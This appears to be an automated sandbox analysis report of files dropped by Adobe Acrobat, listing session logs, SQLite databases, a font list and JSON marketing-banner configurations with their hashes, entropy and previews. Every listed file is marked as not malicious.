                                                    Preview:2024/05/01-15:17:11.203 1ccc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/05/01-15:17:11.213 1ccc Recovering log #3.2024/05/01-15:17:11.214 1ccc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                    Category:dropped
                                                    Size (bytes):65110
                                                    Entropy (8bit):0.801499700567787
                                                    Encrypted:false
                                                    SSDEEP:48:xQBSr4+zPafvHiSa53Ez8cADHjtcvfpb8gA5pamCedAYMlG+T0qlkPXwBjqaOCAG:xCSrDynPa504LXiKp5AY6G+DkPvaO5dE
                                                    MD5:4A3A446C3981FC8A66F8C62BC09995F4
                                                    SHA1:932C324118118494DEA7DE3A72411824E8EB00C3
                                                    SHA-256:2A018093DE5ABF4099D4A4B381F370992416B49CFA3368F7D726888A85843F0F
                                                    SHA-512:E05B4E860BECC71D1FBAF639AF7CD92765378EDE5F3F28A8DECBC62EE0D2FC91A3468A6D361589456036EDD6717AA676DCEEDE5A28D88A9E584287BEFF5CD503
                                                    Malicious:false
                                                    Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                    Category:dropped
                                                    Size (bytes):86016
                                                    Entropy (8bit):4.438750203444174
                                                    Encrypted:false
                                                    SSDEEP:384:yeaci5GNiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:1hurVgazUpUTTGt
                                                    MD5:23D04B9E6AD2A518249A2E10869D988C
                                                    SHA1:6E013BBA76A08386C564AFBD6D69EB8D4A682770
                                                    SHA-256:7489EC96DFB350A5A263658DA948EEA4A93D8050B0812AEBB342DB0499E2FE1C
                                                    SHA-512:B581AF0CABC8B8CCF330C3A0205A0E5120233A2C7BB901A6496E7BF3D85605916AF4D3AE2B092F3F882EA47CEF73E84D15DE082DD50BEF8F0390E64D8D0A4F14
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:SQLite Rollback Journal
                                                    Category:dropped
                                                    Size (bytes):8720
                                                    Entropy (8bit):3.773158596797572
                                                    Encrypted:false
                                                    SSDEEP:48:7Mfp/E2ioyVnioy3DoWoy1CABoy1rKOioy1noy1AYoy1Wioy1hioybioyEoy1noK:7opjun0iAVXKQVyb9IVXEBodRBku
                                                    MD5:237325B77D11F136284D6CE279475211
                                                    SHA1:173671EC3E77CAEAD78AFBCFF1E5FFB38A90F4F2
                                                    SHA-256:0FEC3C26DF27C42B94D2D6681C7907BF301F4A476E3EE8155013C55FFA3D5342
                                                    SHA-512:DB4D4FC7C07FE59A9DF4D25DF61E95E3EFFCFCEB26579416653D868AA44BF73A9C6E12505DAC6D004C37437CCCCF0BA73628958F14E6B658A18273FF5D1AB9C5
                                                    Malicious:false
                                                    Preview:.... .c.....e..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:PostScript document text
                                                    Category:dropped
                                                    Size (bytes):185099
                                                    Entropy (8bit):5.182478651346149
                                                    Encrypted:false
                                                    SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                                                    MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                    SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                                    SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                    SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                    Malicious:false
                                                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):295
                                                    Entropy (8bit):5.367861633163029
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXDEgjsKPqYWsGiIPEeOF0Y6pRoAvJM3g98kUwPeUkwRe9:YvXKXRKsdTeOGuGMbLUkee9
                                                    MD5:07D1952DAEF87FC02FAEBBF6C010C5EF
                                                    SHA1:08AF0EBEA025B455B240E20665610F7DF6970497
                                                    SHA-256:C17E377CD6002F9EBF4FC6E2808A2EEC176CE1BFCD7FA03CD3C7CFAAC80937D0
                                                    SHA-512:08A0CFDABEAF439C2D3B91BC11FB0803C6E6DC86AA9554211877695D08773C72B306BFE7483B8849AF49A4DC333CCC430ACD3BD543AE4BABD96B8DC82615F6FC
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):294
                                                    Entropy (8bit):5.301273318972743
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXDEgjsKPqYWsGiIPEeOF0Y6pRoAvJfBoTfXpnrPeUkwRe9:YvXKXRKsdTeOGuGWTfXcUkee9
                                                    MD5:544E54B29B74BBE67484FFE3329C339C
                                                    SHA1:4D2673FFD7174C2764BD163E7651E4ADE434E9CE
                                                    SHA-256:5827466EB7748342686F96DC70CE8229F2E48CE223EDF00F884CEC33AA2CF0D4
                                                    SHA-512:D0A6155E8F34679E17AFEC3010009CDCDFB80BF03C9B34227F930D282BA7D7B9B02AFC3A4AC4B3CFFF1470402DA4EAFB2C84E3B95D941CCF2F03070F42934EB4
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):294
                                                    Entropy (8bit):5.280541112887412
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXDEgjsKPqYWsGiIPEeOF0Y6pRoAvJfBD2G6UpnrPeUkwRe9:YvXKXRKsdTeOGuGR22cUkee9
                                                    MD5:42D5DCEF397773A80EDCD1BA8DBCC809
                                                    SHA1:4AC30B1D6F8177ABC0DC2979E185D8B5CB8B771C
                                                    SHA-256:E5FEEA28D6CA77EC80D150C109D35992054EF8D67226D374DF83ADBE63E3E8CA
                                                    SHA-512:3D296D5854AE6617BFBED7FD0C446800E6318EC50EAC8D7ECA4EE491FC921A05463717554EF95F0ACF831E085277464305837BEFA1F913C5A8628D8BA97EB880
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):285
                                                    Entropy (8bit):5.354897769540505
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXDEgjsKPqYWsGiIPEeOF0Y6pRoAvJfPmwrPeUkwRe9:YvXKXRKsdTeOGuGH56Ukee9
                                                    MD5:CD5EC1CBE54AF74599401AB2116DD183
                                                    SHA1:1231C5E87B12E40722BB93C91254325E36AA1C29
                                                    SHA-256:C4F9A4E6BE63A76D6899B2342AC94255B5BBA7E344D5EF1CB9CF61DA8F5A32EE
                                                    SHA-512:C776834BE97616B4617A44DA1837F29F1514A00C3C516C00115CC7D81102D43C2506C74837ACB370D91246ACC793C0A85A8DA1D8DBDECFA97680FCA324970BE5
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):292
                                                    Entropy (8bit):5.30299530468373
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXDEgjsKPqYWsGiIPEeOF0Y6pRoAvJfJWCtMdPeUkwRe9:YvXKXRKsdTeOGuGBS8Ukee9
                                                    MD5:3F535623C1E89336DF1218B56331FEBE
                                                    SHA1:B26CF5BBEC4836A39CE1A0C42B900FD1498870DE
                                                    SHA-256:5CCEA0BA2FF1C675B749DC27794B7E80F1B9D2707D8475A6E2374466CF104241
                                                    SHA-512:BA2DBB48306329F71AA97AE18A7386BEE579A46423E41E2E6E51156C5E6548DFEE5CB45113C4CFB5231AAFD983ED419F8EC6A26EF047728333BF6B01F7D41ECA
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):289
                                                    Entropy (8bit):5.289960892892757
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXDEgjsKPqYWsGiIPEeOF0Y6pRoAvJf8dPeUkwRe9:YvXKXRKsdTeOGuGU8Ukee9
                                                    MD5:E0B5811780728E730F4EC96DFFB883ED
                                                    SHA1:D065148B0D12FA2B45F14CC63A90879403860703
                                                    SHA-256:12372DE4BC9337537060BB3B08FB866BF794A68559B204FFF9C46E908DC03A70
                                                    SHA-512:15EB344646459F535642B5A10FA9E837FCB68937E181923D6221CC616AD55AD0AAA7D1E220E442AAC8E6A93F775955B701541F3C45475FA25C540824FFA13D04
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):292
                                                    Entropy (8bit):5.293690043299836
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXDEgjsKPqYWsGiIPEeOF0Y6pRoAvJfQ1rPeUkwRe9:YvXKXRKsdTeOGuGY16Ukee9
                                                    MD5:733A390BD5EB85B399B106E5D6FB7E66
                                                    SHA1:93A2FB0608F82DC6AABEE76B7141BE535998BFE3
                                                    SHA-256:E35B96412FA320129A1D486C39E5E77FE999D1AEB4D9F600CC2160214FEBDAA2
                                                    SHA-512:BF4CC8637783BD2A6C4DDA7CA0AC71F6A56283EFCF2983E2AC9DBDB5D2DF2228E902C0E79F9623066FCD82BCE13E9456BE09D81269C7136F53DDE602B4E024AF
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):289
                                                    Entropy (8bit):5.308922060165751
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXDEgjsKPqYWsGiIPEeOF0Y6pRoAvJfFldPeUkwRe9:YvXKXRKsdTeOGuGz8Ukee9
                                                    MD5:F0A1071759C56A3B1CB8F9356F1B4E89
                                                    SHA1:69EB99E9D581463FAE98981033E09B833FC7BC6F
                                                    SHA-256:02BC065FF0718420A1CD88EDE0CD5CA0E91F56258031B11BF186437B42FC910B
                                                    SHA-512:325DA6BC96787D20FD2F78ABF181BFE4FB765F7D08744C78B820B7B431FA7BAB4880C94FC84F349534729ED8E00ED531B621C84ED51B25B087FB1663F838F6FF
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):1372
                                                    Entropy (8bit):5.738134474580361
                                                    Encrypted:false
                                                    SSDEEP:24:Yv6XRKmeOTKLgENRcbrZbq00iCCBrwJo++ns8ct4mFJNt:YvAZemEgigrNt0wSJn+ns8cvFJP
                                                    MD5:983CCF3D504F24CEB75016E403D2F96E
                                                    SHA1:D59A353354B12E7EB57FBEFA493FA1A370B291EA
                                                    SHA-256:10B96112AFCCABC0BF422BF1F295D88C54E8348F08E51E0D691D2656C542F26C
                                                    SHA-512:9F6979DD7B392C213A596332296A4851955D9F84F27ED2D58398D23EAEF513D3FBEF257D3A5CFCC49A2C1D3FD33E281E12B49AD62D9C2681ED2C966927ED1D8B
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"79887_247329ActionBlock_0","campaignId":79887,"containerId":"1","controlGroupId":"","treatmentId":"acc56846-d570-4500-a26e-7f8cf2b4acad","variationId":"247329"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJUcnkgQWNyb2JhdCBQcm8ifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNSIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTMiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIDctZGF5IHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0byBwcmVtaXVtIFBERiBhbmQgZS1zaWduaW5nIHRvb2xzLiIsImJ
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):289
                                                    Entropy (8bit):5.296099696750638
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXDEgjsKPqYWsGiIPEeOF0Y6pRoAvJfYdPeUkwRe9:YvXKXRKsdTeOGuGg8Ukee9
                                                    MD5:5E246B37423C2985F3634C60D55E9CE9
                                                    SHA1:27097EE39D353BCEE2E4401EF981F53684CBB2CE
                                                    SHA-256:C61BDC1044FC10C051EB0DD8E35E74BAE33AADCEC52912556CC079985DDB9C4D
                                                    SHA-512:FF4BB5EFBF6C13F01C7DA8225CD1AC110BF9AD00C2AEB8692FD062E9362454DED49EA676C0EAB22F603AEF40E41503EEF124BD2E80340913CA9BE567299E929A
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):1395
                                                    Entropy (8bit):5.77681579502978
                                                    Encrypted:false
                                                    SSDEEP:24:Yv6XRKmeOurLgEGOc93W2JeFmaR7CQzttgBcu141CjrWpHfRzVCV9FJNl:YvAZetHgDv3W2aYQfgB5OUupHrQ9FJD
                                                    MD5:23FC51494A15A5BE3B29AC5C91134869
                                                    SHA1:92B479AE0A1A060F9F5B94702E6CB11B10F051A9
                                                    SHA-256:014EBA747EC815F22B9D6A0E037AD011F6A0873E27B38F9C36B7A86A0CFC3A04
                                                    SHA-512:8DDBFBE293915C9F11739508E079CB22C3A6C6E5772A01C6D91A7EBCB5CABC5E58DEF30963516768643F16EA4FC3BFC4E56E325ADEBE86B30B0A750E8782DECA
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):291
                                                    Entropy (8bit):5.279673600632401
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXDEgjsKPqYWsGiIPEeOF0Y6pRoAvJfbPtdPeUkwRe9:YvXKXRKsdTeOGuGDV8Ukee9
                                                    MD5:FB886F257B9B827DF744C6FC3F722DA0
                                                    SHA1:DA303AB143666976687AC985229D4BBC331C1600
                                                    SHA-256:0E706AB2E68F32A7F28D5A4CC7B4F3BEDCE43335440EF3257C3BFDD61448B4E7
                                                    SHA-512:44D2DE2885359434D88F7368A651CEA2864C352ADED24486014E2EF6E6D380AE2F2990F4459FC5C9DC9465A35D15738972A03C66FD5BB8E149924FE3F50CCD78
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):287
                                                    Entropy (8bit):5.2842710672471425
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXDEgjsKPqYWsGiIPEeOF0Y6pRoAvJf21rPeUkwRe9:YvXKXRKsdTeOGuG+16Ukee9
                                                    MD5:8E4795B9A4030B9FA29CE461E7A33229
                                                    SHA1:AD839812C734817EE98472780D1278E8B10F6187
                                                    SHA-256:D2E49C4EB9613B0B771FA26B1C3CE1FFD318C12DD6D233959E86FE5A6A5C186D
                                                    SHA-512:9C17A5E69E66947846F27630B594D17622E20D4FE08F92510C9BF56C5955BEB95821EFCF6FD618A64D2C55D945B2A52F96AC6A7E24974202FBA457D3C2391612
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):289
                                                    Entropy (8bit):5.30321230303391
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXDEgjsKPqYWsGiIPEeOF0Y6pRoAvJfbpatdPeUkwRe9:YvXKXRKsdTeOGuGVat8Ukee9
                                                    MD5:961BECA4CB11C002F2B0095243991CEC
                                                    SHA1:7411736C90825F3A0661314B61FAA9321B860469
                                                    SHA-256:631185BEFAA165509D78276263E077C0E7FF2EC9AF6F2AFBA2DCA32B36A5EF91
                                                    SHA-512:1E92EB7C0F5D93C5BE1F851CD032B19105FA473A722698CB7BE909A5E2B89E6F251FA92B61340C5C730CEC312399EAC2356865086E739C08AFD73ABB0C24A342
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):286
                                                    Entropy (8bit):5.2601790688979415
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXDEgjsKPqYWsGiIPEeOF0Y6pRoAvJfshHHrPeUkwRe9:YvXKXRKsdTeOGuGUUUkee9
                                                    MD5:D1B1E5C98FAF5F4E2E682569B5B945FB
                                                    SHA1:F0C40B1D6F691DDF95269583493D02A07F8A0FB1
                                                    SHA-256:A30054D460679C3CAD51689C32A5D19A6438F0B881780F313FF7B1FE7D79FC85
                                                    SHA-512:E37E5F3FA20FACAE919C32FB5364B4B29BF7BE7D6752CF10544802E063ECA51423AEE5BF90128E4EDE7BEC4874AE6C42678196AB73942A79315BE7526ED7F2A6
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):782
                                                    Entropy (8bit):5.3802923134982485
                                                    Encrypted:false
                                                    SSDEEP:12:YvXKXRKsdTeOGuGTq16Ukee1+3CEJ1KXd15kcyKMQo7P70c0WM6ZB/uhWB:Yv6XRKmeOr168CgEXX5kcIfANho
                                                    MD5:E376415CC34CC851F03B3044AAF04678
                                                    SHA1:4CB36C2B34CA53149A1DA71FBA1F21F0F273768A
                                                    SHA-256:80F217DF378D90EC8B86857B222BC6C464296C5465A15C632FBC86D990FCEEE9
                                                    SHA-512:DB73F15FE28B8C86155521BBDB7FF948519218814168ACC4586774C73CD7D3A68F841D86C6AFB544B4935DEDFD574DF1359C5AFC75DD9EB074E8EE8374C4A81E
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1714569441909}}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):4
                                                    Entropy (8bit):0.8112781244591328
                                                    Encrypted:false
                                                    SSDEEP:3:e:e
                                                    MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                    SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                    SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                    SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                    Malicious:false
                                                    Preview:....
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):2814
                                                    Entropy (8bit):5.139979820267355
                                                    Encrypted:false
                                                    SSDEEP:24:YUlUW2SCfiWcO/D7iVKQBda7ay62K+LjWbEbj0SBZt2nF26V2LSDgCPiC5e29Lni:YG52lc6H0KQeTVEF2yBHiCs29ct
                                                    MD5:6F037FF4E8214AED857C48599510C26F
                                                    SHA1:90B6565E337D1419F7A1A56878DDA53624340031
                                                    SHA-256:2363E8684E02796F0E585CBE3E0857D41433BA4A408A490CBAA3D518E627A524
                                                    SHA-512:5DEEE224596E67252D07B8B62ABBD57A596249B962E825525E2765EC8B75452374ABC2707BCFAFBBBD0FECFB3084182C7BF0EFC449A19EFA7E89DFEB476D5578
                                                    Malicious:false
